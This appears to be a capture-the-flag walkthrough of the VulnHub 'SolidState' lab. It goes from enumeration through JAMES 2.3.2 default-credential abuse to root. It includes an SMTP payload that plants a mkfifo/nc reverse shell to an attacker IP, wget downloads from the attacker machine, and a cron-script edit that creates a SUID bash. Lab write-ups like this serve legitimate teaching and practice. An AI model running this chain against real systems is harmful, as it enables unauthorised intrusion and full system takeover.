Link: https://www.vulnhub.com/entry/solidstate-1,261/
- Network Discovery
2. Port scan
nmap -Pn 10.0.2.25namp -Pn -p1000- 10.0.2.25
3. OS and service scan
nmap -A -p22,25,80,110,119,4555 10.0.2.25
4. Vuln scan
nmap --script vuln -p22,25,80,110,119,4555 10.0.2.25
5. Starting w/ port 80
Nikto
nikto -h http://10.0.2.25
Directory scan
gobuster dir --wordlist /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u http://10.0.2.25/ -x php,txt,html,sh,cgi -q
Access the site
View page source, nothing
services.html
Try XXS, but nothing happened.
Maybe some username?
6. Next one is port 25: JAMES smtpd 2.3.2.
I came across this guide
telnet 10.0.2.25 4555Username: rootPassword: root
HELP
listusers
I changed all password
setpassword <username> 1234
Access these account w/ pop3 service on port 110 using thunderbird
John: there’s a message
Mindy: there’re 2 messages.
I have mindy username and password to login to ssh.
7. login w/ mindy’s credential
ssh mindy@10.0.2.25
ls -lacat user.txt
Try exploring system
cd ..
Restricted
Read passwd
cat /etc/passwd
I’m restricted because of rbash, cannot do anything
8. James 2.3.2: Get ack to exploitation guide
Follow the guide
adduser ../../../../../../../../etc/bash_completion.d password
I have to supply the reverse shell command
Prepare listener on port 443
rlwrap nc -lvp 443
Connect to port 25
telnet 10.0.2.25 25
Following the guide and using reverse shell cheatsheet
EHLO bla.blaMAIL FROM: <'you@domain.com>RCPT TO: <../../../../../../../../etc/bash_completion.d>DATAFrom: bla.bla'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.2.27 443 >/tmp/f.
Login w/ mindy again, you will see some weird stuff.
ssh mindy@10.0.2.25
Back to listener, now I have a shell
whoami
8. Privilege escalation
I need TTY shell.
python -c 'import pty;pty.spawn("/bin/bash");'
I want to run LinEnum.sh
Prepare SimpleHTTPServer on attacker machine
python -m SimpleHTTPServer 80
Download the script
cd /tmpwget http://10.0.2.27/LinEnum.sh
Chnage permission and run
chmod 777 LinEnum.sh/tmp/LinEnum.sh -t
The machine is 32-bit.
There’s /opt/tmp/py -> very interesting
Cannot do anything with these files
Noting on SUID/SGID
Nothing on cron
Verify sudo
sudo -l
No command
Verify capabilities
getcap -r / 2>/dev/null
Let’s check some services beside cron job
ps aux | grep "^root"
I found this ‘cron -f’. There must have something running in the background.
Observe system w/ pspy
This machine is 32-bit. I will download pspy32 to the machine.
wget http://10.0.2.27/pspy32chmod 777 pspy 32/tmp/pspy32
Wait for observation and I got this. It’s that ‘/opt/tmp.py’.
Read the file.
cd /optcat tmp.py
I can append the script w/ this command to get root shell.
echo 'os.system("cp /bin/bash /tmp/rootbash; chmod +xs /tmp/rootbash")' >> tmp.pycat tmp.py
Waiting for a while
cd /tmpls -la
Now I got /tmp/rootbash
Run it
/tmp/rootbash -pwhoami
Now I’m root
Get root.txt
cd /rootls -lacat root.txt